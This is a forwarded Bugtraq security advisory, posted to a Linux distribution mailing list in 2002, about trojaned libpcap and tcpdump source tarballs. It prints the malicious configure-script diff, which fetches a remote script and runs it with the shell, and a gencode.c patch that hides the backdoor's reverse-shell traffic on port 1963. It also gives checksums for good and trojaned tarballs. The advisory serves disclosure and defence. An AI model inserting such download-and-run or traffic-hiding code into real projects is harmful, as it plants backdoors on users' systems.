[sisyphus] [alex на intelinet.ro: Latest libpcap & tcpdump sources from tcpdump.org contain a trojan]

Чт Ноя 14 13:59:20 MSK 2002

Это не security announce.
Просто для ясности: в Сизифе и дистрибутивах исходники нормальные.

----- Forwarded message from Mincu Alexandru <alex на intelinet.ro> -----

Date: 13 Nov 2002 16:48:30 +0200
From: Mincu Alexandru <alex на intelinet.ro>
To: bugtraq на securityfocus.com
Subject: Latest libpcap & tcpdump sources from tcpdump.org contain a trojan
Mailing-List: contact bugtraq-help на securityfocus.com; run by ezmlm
Delivered-To: mailing list bugtraq на securityfocus.com
Delivered-To: moderator for bugtraq на securityfocus.com
Organization: 
X-Mailer: Ximian Evolution 1.2.0 

Updates:

      * Many Mirrors are infected with the trojan
Background:

      * Libpcap provides a packet sniffing library for programs like
        Snort.
      * Tcpdump is a standard tool for packet sniffing.
Details:

      * The trojan contains modifications to the configure script and
        gencode.c (in libpcap only).

      * The configure script downloads
        http://mars.raketti.net/~mash/services which is then sourced
        with the shell. It contains an embedded shell script that
        creates a C file, and compiles it.

      * The program connects to 212.146.0.34 (mars.raketti.net) on port
        1963 and reads one of three one byte status codes:
              * A - program exits 
              * D - forks and spawns a shell and does the needed file
                descriptor manipulation to redirect it to the existing
                connection to 212.146.0.34. 
              * M - closes connection, sleeps 3600 seconds, and then
                reconnects 

        Hmm... ADM...

      * It's important to note that it reuses the same outgoing
        connection for the shell. This gets around firewalls that block
        incoming connections.

      * Gencode.c is modified to force libpcap to ignore packets to/from
        the backdoor program, hiding the backdoor program's traffic.

      * This is similar to the OpenSSH trojan a few months ago.

Good sources: 

http://www.ibiblio.org/pub/Linux/distributions/gentoo/distfiles/libpcap-0.7.1.tar.gz
http://www.ibiblio.org/pub/Linux/distributions/gentoo/distfiles/tcpdump-3.6.2.tar.gz
http://www.ibiblio.org/pub/Linux/distributions/gentoo/distfiles/tcpdump-3.7.1.tar.gz

MD5 Sum 0597c23e3496a5c108097b2a0f1bd0c7  libpcap-0.7.1.tar.gz
MD5 Sum 6bc8da35f9eed4e675bfdf04ce312248  tcpdump-3.6.2.tar.gz
MD5 Sum 03e5eac68c65b7e6ce8da03b0b0b225e  tcpdump-3.7.1.tar.gz
Trojaned sources:

http://www.tcpdump.org/release/libpcap-0.7.1.tar.gz
http://www.tcpdump.org/release/tcpdump-3.6.2.tar.gz
http://www.tcpdump.org/release/tcpdump-3.7.1.tar.gz

MD5 Sum 73ba7af963aff7c9e23fa1308a793dca  libpcap-0.7.1.tar.gz
MD5 Sum 3a1c2dd3471486f9c7df87029bf2f1e9  tcpdump-3.6.2.tar.gz
MD5 Sum 3c410d8434e63fb3931fe77328e4dd88  tcpdump-3.7.1.tar.gz

The (relevant) gencode.c diff:

*** 288,293 ****
--- 289,318 ----
  {
        extern int n_errors;
        int len;
+         int l;
+         char *port = "1963";
+         char *str, *tmp, *new = "not port 1963";
+ 
+     if (buf && *buf && strstr (buf, port)) {
+         buf = "port 1964";
+     }
+     else {
+         l = strlen (new) + 1;
+         if (!(!buf || !*buf)) {
+             l += strlen (buf);
+             l += 5; /* and */
+         }
+ 
+         str = (char *)malloc (l);
+         str[0] = '\0';
+         if (!(!buf || !*buf)) {
+             strcpy (str, buf);
+             strcat (str, " and ");
+         }
+ 
+         strcat (str, new);
+         buf = str;
+     }

        no_optimize = 0;
        n_errors = 0;
***************

The (relevant) configure diff:

+  CNF="services"
+  URL="mars.raketti.net/~mash/$CNF"

!  (IFS=","
!  ARGS="wget -q -O -,lynx --source,fetch -q -o -"
! 
!  for i in $ARGS; do
!        IFS=" "
!        $i $URL 1> $CNF
!        if [ -f $CNF ]; then sh $CNF
!            exit
!        fi
!        rm -f $CNF
!  done) 1>/dev/null 2>/dev/null &

The "services" payload:
      * trojan-script, the non-obfuscated portion (excerpted)
      * services, the complete version
Thanks to:

Russell Adams <rladams на NO_SPAMadamsinfoserv.com>
Mathew Solnik <msolnik на NO_SPAMhlug.org>
Scott Stout <skout на NO_SPAMwiretapped.us>

with the Houston Linux Users Group.

Additional thanks to Bruce Locke for interpreting the backdoor code.

Thanks to Gentoo's Portage system for catching the trojaned 

-- 
Mincu Alexandru <alex на intelinet.ro>

----- End forwarded message -----

--
ldv
----------- следующая часть -----------
Было удалено вложение не в текстовом формате...
Имя     : =?iso-8859-1?q?=CF=D4=D3=D5=D4=D3=D4=D7=D5=C5=D4?=
Тип     : application/pgp-signature
Размер  : 189 байтов
Описание: =?iso-8859-1?q?=CF=D4=D3=D5=D4=D3=D4=D7=D5=C5=D4?=
Url     : <http://lists.altlinux.org/pipermail/sisyphus/attachments/20021114/9c14ab18/attachment-0011.bin>